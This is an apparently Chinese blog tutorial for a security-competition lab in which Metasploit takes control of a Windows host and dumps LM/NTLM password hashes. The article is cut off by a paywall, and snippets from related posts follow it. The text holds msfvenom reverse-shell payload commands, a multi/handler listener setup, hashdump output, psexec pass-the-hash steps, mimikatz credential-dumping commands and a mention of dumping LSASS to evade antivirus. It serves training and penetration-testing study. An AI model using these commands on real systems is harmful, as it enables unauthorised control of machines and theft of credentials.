蓝桥杯-网络安全比赛(6) 模拟实验 Metasploit 控制并获取Windows 登录HASH、LM Hash和NTLM Hash密文解析

原创 已于 2024-05-11 21:36:06 修改 · 1.2k 阅读 · 21 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #windows #哈希算法 #安全 #蓝桥杯 #密码学 #网络攻击模型

于 2024-05-06 19:33:20 首次发布

窃取WINDOWS账号密码

系统环境:主机(Windows系统 IP:192.168.126.129),虚拟机(KALI系统 IP:192.168.126.3),两者需要能通过本地网络互通互连。
攻击工具:Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。

控制Windows系统

  1. 生成反弹型木马
    进入KALI系统,使用以下代码生成程序,反弹到的监听端地址为192.168.126.3,监听端口为12345,文件输出格式为exe并保存到当前路径\~
    msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.126.3 LPORT=12345 -f exe -o shell.exe
  1. 在本地通过GIT BASH或其它BASH程序使用SCP命令拉取代码到D盘根目录.
    scp root
scp root@192.168.126.3:/root/shell.exe /d
  1. 返回KALI,并开启监听程序
    exploit
msfconsole #进入Metasploit组件
use exploit/multi/handler #使用反向Shell模块,用于接收反弹的Shell
set paload windows/x64/meterpreter/reverse_tcp #它一种常见的
最低0.47元/天 解锁文章
【神兵利器】——188、MSF获取凭据
Fly_鹏程万里
10-16 228
Metasploit Framework(简称MSF)是一个功能强大的开源渗透测试框架,广泛应用于网络安全领域,作为一款功能丰富且灵活的工具,MSF提供了多种模块技术,用于发现漏洞、执行远程代码、获取凭据等操作以评估系统网络的安全性。
使用Metasploit进行内网渗透
m0_51468027的博客
05-07 2013
一、网络拓扑图 假如我们拿到了一台主机比如Win2008的shell,如何通过该主机进行内网渗透,拿到比如下图中数据服务器的最高权限? 二、Win2008主机上线 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.6 lport=4444 -f exe > /var/www/html/w01ke.exe msfconsole use exploit/multi/handler set payload windows/meterpr
网络安全实验2 模拟攻击与漏洞扫描
qq_26103901的博客
07-12 1973
nmap还提供了一些高级的特征,例如:通过TCP/IP协议栈特征探测操作系统类型,秘密扫描,动态延时重传计算,行扫描,通过行ping扫描探测关闭的主机,诱饵扫描,避开端口过滤检测,直接RPC扫描(无须端口映射),碎片扫描,以及灵活的目标端口设定。ping命令探测技巧:使用ping可以测试目标主机名称IP地址,验证与远程主机的连通性,通过将ICMP回显请求数据包发送到目标主机,监听来自目标主机的回显应答数据包来验证与一台或多台远程主机的连通性,该命令只有在安装了TCP/IP协议后才可以使用。
meterpreter详解与渗透实战
热门推荐
成长
01-24 3万+
payload介绍,meterpreter详解,以及网络渗透实战(拿下老爸电脑)
2024年---蓝桥杯网络安全赛道部分WP
2201_75556700的博客
04-29 2993
于是我接着用抓包工具,先开启代理,然后用bp抓包,抓到包之后,将robots.txt修改为790032299b331cf6758dced2433f74ab。6、点击 24853fafeb79aca39ffdcaaaaa9a621a这个文件,点开之后跳转到一个页面,得到flag。4、根据它的意思,我们可知output是真正的flag解码出来的,所以我们需要逆着它的过程来求出flag。2、用wireshark分析,看到了一个cat flag的字样。1、下载附件,打开是一个html。1、点开链接,页面提示。
Windows的密码生成算法——NTLM算法破解
Onlyone_1314的博客
02-18 1万+
NTLM:CDABE1D16CE42A13B8A9982888F3E3BE hint:密码长度不超过5,数字符号组成 WindowsNTLM Hash生成原理:‍‍   IBM设计的LM Hash算法存在几个弱点,微软在保持向后兼容性的同时提出了自己的挑战响应机制,NTLM Hash便应运而生。   假设明文口令是”123456″:   1、首先转换成Unicode字符串,与LM Hash算法不同,这次不需要添加0补足14字节,从ASCII串转换成Unicode串时,使用little-endian序.
网络安全管理员(三级)操作12
m0_62907317的博客
04-10 1226
vim /etc/rsyslog.conf 或者是 vi /etc/rsyslog.conf。第五题: vi /etc/logrotate.conf 进入。58行这里就是第一题,系统登录产生的日志级别为info。60行对应第二题,内核产生的日志级别为debug。62行对应第三题,用户程序产生的日志级别为err。来到162行,复制改为163行,这里的代码。全部改完 esc :wq 保存退出。2.2.3 Linux 系统日志管理。esc : wq 保存退出。
ATT&CK实战系列-Vulnstack三层网络域渗透靶场(一)
M372109150的博客
09-22 1932
本篇为红日安全的ATT&CK实战系列-红队评估 (一)Vulnstack三层网络域渗透靶场, 靶场下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
内网渗透-Kerberos认证流程详解
2401_83799022的博客
05-24 975
kerberos是一种计算机网络认证协议,他能够为网络中通信的双方提供严格的身份验证服务,确保通信双方身份的真实性安全性。不同于其他网络服务,kerberos协议中不是所有的客户端向想要访问的网络服务发起请求,他就能够建立连接然后进行加密通信。而是在发起服务请求后必须先进行一系列的身份认证,包括客户端服务端两方的双向认证,只有当通信双方都认证通过对方身份之后,才可以互相建立起连接,进行网络通信。
网络安全管理员_三级_操作技能考核解题过程(8)
front的博客
11-01 6364
上保存当前配置,配置文件名为“GB3_114.cfg”,业务参数:创建名为“wlan-sec”的安全模板,配置安。VLAN,且引用安全模板 SSID 模板。创建域管理模板,在域管理模板下配置。配置名称,便于从名称上就能够了解。模板,配置业务数据转发模式、业务。服务器,其中,VLANIF100。模板,配置业务数据转发模式、业务。进行配置,具体拓扑如下图所示。”的安全模板,配置安全策。正确配置域管理模板下配置。作为基于接口地址池的。”,用于将相同配置的。的国家码为中国,在。”,用于将相同配置的。
使用Hash直接登录WindowsHASH传递)
weixin_30498921的博客
01-23 535
抓取windows hash值 得到administrator的hash: 598DDCE2660D3193AAD3B435B51404EE:2D20D252A479F485CDF5E171D93985BF msf调用payload: use exploit/windows/smb/psexec show options set RHOST 192.168.81.129 set ...
利用哈希传递登录 RDP 远程桌面
网络安全。
01-15 3268
Windows Server 2012 R2 采用了新版的 RDP 远程桌面协议,在这个新版协议中有一个 ”受限管理员” (Restricted Admin)的特性。相信渗透测试人员系统管理员都会对这个特性有足够的兴趣,因为通过这个特性,我们可以实现哈希传递攻击成功登录远程桌面。在抓取到的 Hash 无法破解的情况下,如果目标主机开启了 “Restricted Admin Mode” 也行,那么我们便可以使用 Hash 来直接实现 RDP 远程登录
meterpreter中使用mimikatz获取windows密码
浅笑996的博客
07-01 4472
进去meterpreter后getuid一下 这获得系统管理员权限 开始 加载mimikatz模块 load mimikatz 加载成功. 第一种方法: 获取登录密码的hash值 msv 上面已经是得到hash值了. 下面算明文密码. 获取明文密码 kerberos look...拿到登录的明文密码了. 第二种方法: 使用另一种方式获取哈希值 mimikatz_command -f samdump::hashes 根据上面的方式获取明文密码 ...
渗透利器-kali工具 (第六章-1) 密码破解 - Hashcat
最新发布
ztc131450的博客
12-18 1818
6-8位数字+小写字母密码:--increment --increment-min 6 --increment-max 8?6-8位字母密码:--increment --increment-min 6 --increment-max 8?-a 指定要用的扫描模式,其值参考后面对应的参数,"-a 0" 字典攻击,"-a 1" 组合攻击,"-a 3" 掩码攻击。--increment-min 密码最小长度,后面直接等于一个整数即可,配置increment模式一起使用。
Kali Linux渗透测试之提权(二)——Fgdump、Mimikatz、WCE
weixin_45116657的博客
08-18 3090
1、Windows身份认证的过程 在登录窗口输入账号密码后,winlogon.exe会将输入的密码进行lmhashnthash加密; 然后将加密后的密码与SAM账户数据库进行比对,如果比对匹配,则成功登录操作系统(本地登录); 如果网络中的一台主机尝试远程登录另一台主机,登录的账号密码也是通过本地计算机将输入的密码进行lmhashnthash计算,然后将加密后的密文通过网络传输到目标主...
1、使用Hash直接登录Windows
Fly_鹏程万里
05-17 3329
环境攻击机   :  kali linux 2018                        192.168.11.144目标主机:Windows server 2003 R2          192.168.11.133主要用途这个可以用于后渗透测试阶段,当我们获取到一个系统的一个WEBshell之后,我们可以上传gethashes.exe到该目标系统,之后在目标系统中获取当前登录用户的...
metasploit获取系统密码hash
天元喜羊羊的博客
04-27 6162
meterpreter > run hashdump [*] Obtaining the boot key... [*] Calculating the hboot key using SYSKEY e503dc5ce6734d7f11ccecf5623b0f1c... [*] Obtaining the user list and keys... [*] Decrypting user keys
windows获取系统管理员账号明文密码工具mimikatz使用
Coding&Sharing
02-15 7902
该工具可以让我们获取Windows系统密码的明码  运行软件后,输入两条命令: 第一条:privilege::debug //提升权限 第二条:sekurlsa::logonpasswords //抓取密码 下载地址:mimikatz获取系统管理员账号明文密码工具
利用procdump+Mimikatz 绕过杀软获取Windows明文密码
冷风
09-30 2万+
Mimikatz现在已经内置在Metasploit’s meterpreter里面,我们可以通过meterpreter下载。但是你如果觉得还要考虑杀毒软件,绑定payload之类的东西太过复杂,我们可以有更好的办法,只需要在自己的电脑上运行Mimikatz alpha(地址)版本,然后处理dump的LSASS进程内存文件就行!那么如何dump LSASS进程内存呢。可以通过以下方式:1.对于NT6
使用Metasploit生成木马获取Windows控制权实验
"该实验是关于网络攻防的实践,主要使用Metasploit框架来生成木马,以获取Windows系统的远程控制权。实验环境包括Windows 10操作系统Kali Linux虚拟机,其中Kali Linux作为攻击机,利用内置的msfvenom工具创建木马...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值